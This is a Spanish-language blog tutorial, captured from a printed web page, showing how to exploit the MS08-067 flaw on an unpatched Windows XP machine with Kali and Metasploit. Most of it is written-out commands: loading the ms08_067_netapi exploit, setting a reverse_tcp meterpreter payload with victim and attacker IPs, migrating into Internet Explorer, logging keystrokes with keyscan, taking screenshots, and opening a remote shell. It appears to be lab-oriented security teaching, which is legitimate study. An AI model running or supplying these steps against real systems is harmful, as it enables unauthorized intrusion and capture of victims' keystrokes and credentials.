explotar vulnerabilidades con kali y meterpreter

Alejandro Fernndez-Trejo L

Ver todo mi perfil

+10m

PRINCIPAL NOTICIAS HARDWARE TUTORIALES JUEGOS

LUNES, 28 DE OCTUBRE DE 2013

Hemos descubierto una vulnerabilidad en un sistema Windows XP por no tener el sistema

operativo actualizado, vamos a explotar esa vulnerabilidad con el live CD de Kali y

meterpreter.

Una vez arrancada la mquina Kali y configurado la red abrimos la terminal y ejecutamos el

comando

- msfconsole

Tardar un poco. Una vez que termine usamos el exploit para la vulnerabilidad que hemos

encontrado, que en este caso es ms08_067_netapi, con el comando:

- use exploit /windows/smb/ms08_067_netapi

Y mediante el comando

- show options

Vemos las opciones que hay que configurar del exploit.

POSTED BY : ALEJANDRO FERNNDEZ-TREJO LUNA

Explotar vulnerabilidades con Kali y meterpreter. http://infyseg.blogspot.com/2013/10/explotar-vulnerabilidades-con-kali-y...

1 de 8 15/07/2014 07:52 p.m.

Hackear redes Wifi con Kali y w

Ataque Man In The Middle con

Clonacin de sitio web con Kali

se-toolkit

Programar apagado del sistema

Windows 8.1

Explotar vulnerabilidades con K

meterpreter.

Pero antes de

rellenar las opciones cargaremos el PAYLOAD meterpreter, con el que aprovecharemos la

vulnerabilidad, con el comando:

- set PAYLOAD windows/meterpreter/reverse_tcp

Tras esto configuramos las distintas opciones:

- set RHOST 192.168.100.2(IP de la vctima)

- set LHOST 192.168.100.1(IP del atacante)

Ahora ejecutamos el comando

- exploit

Para acceder a la mquina victima.

Migrar a otro proceso.Ahora en el equipo victima abrimos el navegador Internet Explorer.

Account Sign UpConnect With Your FriendsOnline. Join the Facebook


2 de 8 15/07/2014 07:52 p.m.

Tutoriales(10) Seguridad(6) gameplayOperativoshardwareaccion (3)(3) tarjetas graficas

Vamos a la mquina

Kali con el comando:

- ps (para ver el ID

del proceso)

- migrate

Nos cambiamos al proceso de Internet Explorer

Keylogger

Ejecutamos el comando:

- keyscan_start

Para que empiece a guardar todo lo que sea escrito en Internet Explorer por teclado. Vamos

al equipo Windows XP y escribimos algo en la barra de direcciones.


3 de 8 15/07/2014 07:52 p.m.

Vamos de nuevo a Kali y ejecutamos el comando:

- keyscan dump

Para mostrar lo que ha sido capturado

Con el comando:

- keyscan_stop

Dejamos de capturar.

Captura de pantallaPara hacer una captura de pantalla con meterpreter solo tenemos que introducir el comando

screenshot + la direccin IP de la victima

- screenshot 192.168.100.2


4 de 8 15/07/2014 07:52 p.m.

Podemos ver las

capturas de pantalla en

la carpeta /root

Obtener shell de WinXp y crear fichero en escritorio.

Usamos el comando:

- shell

Para que nos devuelva la shell de la mquina de Windows XP, tras esto con el

comado cd nos movemos hasta el escritorio.

Ahora mediante el comando echo "cadena de texto que queramos" > (redireccion hacia el

fichero que vamos a crear) fichero.txt

Crearemos un fichero en el escritorio de WinXP.

Mediante el comando dir podemos ver el contenido de la carpeta Escritorio y como esta

creado el fichero.


5 de 8 15/07/2014 07:52 p.m.

Comparte

Volver a la pgina principal

Informtica , Kali , Meterpreter , Seguridad , Sistemas Operativos , Tutoriales ,

Vulnerabilidades , Windows XP

Explotar vulnerabilidades con Kali y meterpreter.


6 de 8 15/07/2014 07:52 p.m.

Configuracin de red en VirtualBox

Creacin de una mquina virtual con Virtual Box

Recuperacin de Datos

VIRTUAL BOX CON DOS SISTEMAS OPERATIVOS

Hackear redes Wifi con Kali y wifite

Clonacin sitio web con se-toolkit y Man In The Middle con DNS Spoofing

Clonacin de sitio web con Kali y se-toolkit

Ataque Man In The Middle con Ettercap

Explotar vulnerabilidades con Kali y meterpreter.

Google Hacking - Busqueda de informacin.

Programar apagado del sistema en Windows 8.1

Instalar un Sistema Operativo desde un Pendrive.

Servidor de Mensajeria Openfire 2Parte

Servidor de Mensajeria Openfire

Secunia - Actualizaciones del sistema.

Instalacin y configuracin del servicio FTP en Linux con VSFTPD.

Informtica, Kali, Meterpreter, Seguridad, Sistemas Operativos, Tutoriales, Vulnerabilidades,

Windows XP

Deja un Comentario


7 de 8 15/07/2014 07:52 p.m.

NEXTEntradas Anteriores

Comentar como:

Publicar

Subscribete al Post | Subscribete a los Comentarios

FacebookAccount Sign Up

Connect With Your FriendsOnline. Join the Facebook

Community - Free!


8 de 8 15/07/2014 07:52 p.m.

explotar vulnerabilidades con kali y meterpreter

Documents